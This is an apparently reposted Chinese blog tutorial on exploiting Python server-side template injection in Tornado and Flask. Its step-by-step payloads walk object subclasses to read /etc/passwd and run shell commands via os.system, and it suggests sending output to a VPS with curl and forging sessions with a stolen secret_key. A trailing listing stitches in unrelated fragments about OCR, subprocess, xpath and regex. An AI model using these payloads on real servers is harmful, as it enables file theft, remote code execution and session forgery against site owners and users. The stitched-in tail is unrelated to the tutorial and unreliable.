python SSTI利用

原理
python的SSTI不仅可以向网页插入一些XSS代码,而且还可以获取一些变量和函数信息,尤其是secret_key,如果获取到则可以对flask框架的session可以进行伪造。
对于tornado框架,render(request, ‘account/login.html‘, {‘error‘: error_msg}如果error_msg用户可控,那么就存在注入。
如果error_msg为<script>alert(1)</script>,如果没有过滤则会执行XSS
如果error_msg为{{data}}的话,data则可以执行一些简单的表达式和获取变量,例如:
用户输入error_msg:{{1+1}} 页面则返回:2
对于flask框架,有时需要根据需要对页面进行显示类中的一些属性,例如用户传入name则返回类中name属性,传入id返回类中id属性的话,那么就可以利用一些魔术方法获得全局变量,例如:
对于返回的是定义的Class内的话:
__dict__   //返回类中的函数和属性,父类子类互不影响
__base__ //返回类的父类 python3
__mro__ //返回类继承的元组,(寻找父类) python3
__init__ //返回类的初始化方法   
__subclasses__()  //返回类中仍然可用的引用  python3
__globals__  //对包含函数全局变量的字典的引用 python3
对于返回的是类实例的话:
__class__ //返回实例的对象,可以使类实例指向Class,使用上面的魔术方法

对于tornado render注入类似的利用
一。任意文件读取
①{{‘ ‘.__class__}}        //  <class ‘str‘>
②{{‘ ‘.__class__.__mro__}}  // (<class ‘str‘>, <class ‘object‘>)
③{{‘ ‘.__class__.__mro__[1].__subclasses__()}}  //取到object类的子类,如下:
[<class ‘type‘>, <class ‘weakref‘>, <class ‘weakcallableproxy‘>, <class ‘weakproxy‘>, <class ‘int‘>, <class ‘bytearray‘>, <class ‘bytes‘>, <class ‘list‘>, <class ‘NoneType‘>, <class ‘NotImplementedType‘>, <class ‘traceback‘>, <class ‘super‘>, <class ‘range‘>, <class ‘dict‘>, <class ‘dict_keys‘>, <class ‘dict_values‘>, <class ‘dict_items‘>, <class ‘odict_iterator‘>, <class ‘set‘>, <class ‘str‘>, <class ‘slice‘>, <class ‘staticmethod‘>, <class ‘complex‘>, <class ‘float‘>, <class ‘frozenset‘>, <class ‘property‘>, <class ‘managedbuffer‘>, <class ‘memoryview‘>, <class ‘tuple‘>, <class ‘enumerate‘>, <class ‘reversed‘>, <class ‘stderrprinter‘>, <class ‘code‘>, <class ‘frame‘>, <class ‘builtin_function_or_method‘>, <class ‘method‘>, <class ‘function‘>, <class ‘mappingproxy‘>, <class ‘generator‘>, <class ‘getset_descriptor‘>, <class ‘wrapper_descriptor‘>, <class ‘method-wrapper‘>, <class ‘ellipsis‘>, <class ‘member_descriptor‘>, <class ‘types.SimpleNamespace‘>, <class ‘PyCapsule‘>, <class ‘longrange_iterator‘>, <class ‘cell‘>, <class ‘instancemethod‘>, <class ‘classmethod_descriptor‘>, <class ‘method_descriptor‘>, <class ‘callable_iterator‘>, <class ‘iterator‘>, <class ‘coroutine‘>, <class ‘coroutine_wrapper‘>, <class ‘EncodingMap‘>, <class ‘fieldnameiterator‘>, <class ‘formatteriterator‘>, <class ‘filter‘>, <class ‘map‘>, <class ‘zip‘>, <class ‘moduledef‘>, <class ‘module‘>, <class ‘BaseException‘>, <class ‘_frozen_importlib._ModuleLock‘>, <class ‘_frozen_importlib._DummyModuleLock‘>, <class ‘_frozen_importlib._ModuleLockManager‘>, <class ‘_frozen_importlib._installed_safely‘>, <class ‘_frozen_importlib.ModuleSpec‘>, <class ‘_frozen_importlib.BuiltinImporter‘>, <class ‘classmethod‘>, <class ‘_frozen_importlib.FrozenImporter‘>, <class ‘_frozen_importlib._ImportLockContext‘>, <class ‘_thread._localdummy‘>, <class ‘_thread._local‘>, <class ‘_thread.lock‘>, <class ‘_thread.RLock‘>, <class ‘_frozen_importlib_external.WindowsRegistryFinder‘>, <class ‘_frozen_importlib_external._LoaderBasics‘>, <class ‘_frozen_importlib_external.FileLoader‘>, <class ‘_frozen_importlib_external._NamespacePath‘>, <class ‘_frozen_importlib_external._NamespaceLoader‘>, <class ‘_frozen_importlib_external.PathFinder‘>, <class ‘_frozen_importlib_external.FileFinder‘>, <class ‘_io._IOBase‘>, <class ‘_io._BytesIOBuffer‘>, <class ‘_io.IncrementalNewlineDecoder‘>, <class ‘posix.ScandirIterator‘>, <class ‘posix.DirEntry‘>, <class ‘zipimport.zipimporter‘>, <class ‘codecs.Codec‘>, <class ‘codecs.IncrementalEncoder‘>, <class ‘codecs.IncrementalDecoder‘>, <class ‘codecs.StreamReaderWriter‘>, <class ‘codecs.StreamRecoder‘>, <class ‘_weakrefset._IterationGuard‘>, <class ‘_weakrefset.WeakSet‘>, <class ‘abc.ABC‘>, <class ‘collections.abc.Hashable‘>, <class ‘collections.abc.Awaitable‘>, <class ‘collections.abc.AsyncIterable‘>, <class ‘async_generator‘>, <class ‘collections.abc.Iterable‘>, <class ‘bytes_iterator‘>, <class ‘bytearray_iterator‘>, <class ‘dict_keyiterator‘>, <class ‘dict_valueiterator‘>, <class ‘dict_itemiterator‘>, <class ‘list_iterator‘>, <class ‘list_reverseiterator‘>, <class ‘range_iterator‘>, <class ‘set_iterator‘>, <class ‘str_iterator‘>, <class ‘tuple_iterator‘>, <class ‘collections.abc.Sized‘>, <class ‘collections.abc.Container‘>, <class ‘collections.abc.Callable‘>, <class ‘os._wrap_close‘>, <class ‘_sitebuiltins.Quitter‘>, <class ‘_sitebuiltins._Printer‘>, <class ‘_sitebuiltins._Helper‘>, <class ‘__main__.Parent‘>]
④{{‘ ‘.__class__.__mro__[2].__subclasses__()[40](‘/etc/passwd‘).read()}} //取到<type ‘file‘>读取文件
二。命令执行
①{{‘ ‘.__class__.__mro__[1].__subclasses__()}}  //和前面一样先取到object类的子类
②{{‘ ‘.__class__.__mro__[2].__subclasses__()[119].__init__}} //取到<class ‘_sitebuiltins._Printer‘>__init__的地址
③{{‘ ‘.__class__.__mro__[2].__subclasses__()[119].__init__.__globals__}}//获得<class ‘_sitebuiltins._Printer‘>类的所有的全局变量
④{{‘ ‘.__class__.__mro__[2].__subclasses__()[119].__init__.__globals__[‘os‘].system(‘ls‘)}} //找到os类执行代码,注:自身实验不存在,视情况而定,命令执行结果无法直接看到,可以用curl将结果发送到vps
上面例子的实际运用:
在一般情况下,模板注入的地方都是位于服务端构造的一个类内,所以可以用
1.__class__.__init__.__globals__  //获得当前类的全局变量
2.__class__.__mro__   //查看所有的类,再用__class__.__mro__[number].__init__.__globals__查看变量
3.__class__.__init__.__globals__[app].__dict__ //查看内部的详细信息
如果获得secret_key就可以伪造session

原文地址:https://www.cnblogs.com/cimuhuashuimu/p/11544438.html

时间: 2024-08-30 15:27:45

python SSTI利用的相关文章

【Python】利用当前时间、随机数产生一个唯一的数字

Python生成当前时间很简单,比Java的代码简短多了,Java产生时间具体详见<[Java]有关System.currentTimeMillis()的思考>(点击打开链接) 具体代码如下: #-*-coding:utf-8-*- import datetime now = datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S") print now; 运行结果如下,输出当前的时间,时间格式根据strftime("

Python中利用Tesseract软件来识别图片中的英文与中文

OCR与Tesseract介绍   将图片翻译成文字一般被称为光学文字识别(Optical Character Recognition,OCR).可以实现OCR 的底层库并不多,目前很多库都是使用共同的几个底层OCR 库,或者是在上面进行定制. Tesseract 是一个OCR 库,目前由Google 赞助(Google 也是一家以OCR 和机器学习技术闻名于世的公司).Tesseract 是目前公认最优秀.最精确的开源OCR 系统. 除了极高的精确度,Tesseract 也具有很高的灵活性.它

Python 3 利用 subprocess 实现管道( pipe )交互操作读/写通信

这里我们用Windows下的shell来举例: from subprocess import * #因为是举例,就全部导入了 为了方便你理解,我们用一个很简单的一段代码来说明: 可以看见我们利用Popen实例化了一个p,创建了子程序cmd.exe,然后我们给他的的Stdin(标准输入流)Stdout(标准输出流); 同时使用了subprocess.PIPE 作为参数,这个是一个特殊值,用于表明这些通道要开放.(在Python3.5,加入了run()方法来进行更好的操作) 然后我们继续 这些信息是

Python中利用xpath解析HTML

在进行网页抓取的时候,分析定位html节点是获取抓取信息的关键,目前我用的是lxml模块(用来分析XML文档结构的,当然也能分析html结构), 利用其lxml.html的xpath对html进行分析,获取抓取信息: 首先,我们需要安装一个支持xpath的python库.目前在libxml2的网站上被推荐的python binding是lxml,也有beautifulsoup,不嫌麻烦的话还可以自己用正则表达式去构建,本文以lxml为例讲解. 假设有如下的HTML文档 1 <html> 2 &

初学Python之利用map编写姓名格式化输出函数

利用map()函数,把用户输入的不规范的英文名字,变为首字母大写,其他小写的规范名字.例如输入:['adam', 'LISA', 'barT'],输出:['Adam', 'Lisa', 'Bart']. 代码: #定义一个list L = [] #设置名字的个数 n = int(raw_input("Please enter the number of the name:")) #利用循环将名字追加到list里面 for num in range(n):     names = raw

python中利用正则表达式匹配ip地址

现在有一道题目,要求利用python中re模块来匹配ip地址,我们应如何着手? 首先能想到的是ip地址是数字,正则表达式是如何匹配数字的呢? \d或[0-9] 对于这个问题,不要一下子上来就写匹配模式,应该一步步分解,把复杂的问题简单化 比如ip地址,我们可以总结一下规律 1. 它是一个字符串 2. 字符串内部是由4个1-3位的数字和3个.组成 3. 数字的范围是0-255 接下来,我们先试一下匹配第1个数字 第一步:尝试匹配192.168.100.123中的192 >>> import

[Python][爬虫]利用OCR技术识别图形验证码

ocr图片识别通常可以利用tesserocr模块,将图片中内容识别出来并转换为text并输出 Tesserocr是python的一个OCR识别库,是对tesseract做的一层python APT封装.在安装Tesserocr前,需要先安装tesseract tessrtact文件: https://digi.bib.uni-mannheim.de/tesseract/ python安装tessocr: 下载对应的.whl文件安装(这个包pip方式容易出错) tesseract 与对应的tess

【转】Python+opencv利用sobel进行边缘检测(细节讲解)

#! usr/bin/env python # coding:utf-8 # 2018年7月2日06:48:35 # 2018年7月2日23:11:59 import cv2 import numpy as np import matplotlib.pyplot as plt img = cv2.imread('number.jpg',0) # 其中,0表示将图片以灰度读出来. #### 图像边缘处理sobel细节 sobelx = cv2.Sobel(img,cv2.CV_64F, 1, 0,

Python中利用进度条求圆周率

从祖冲之到现在,圆周率的发展越来越丰富,求法也是越来越快其中: 1.求圆周率的方法: (1)蒙特卡罗法 这是基于“随机数”的算法,通过计算落在单位圆内的点与正方形内的比值来求圆周率PI. 如果一共投入N个点,其中有M个落入圆中,则要点均匀,假定圆周率的半径为R,则: (2)欧拉恒等式公式为: 基础的泰勒级数: (2)求python进度表 代码: #!/usr/bin/env python# -*- coding: utf-8 -*-# @Time : 18-5-21 下午3:44# @Autho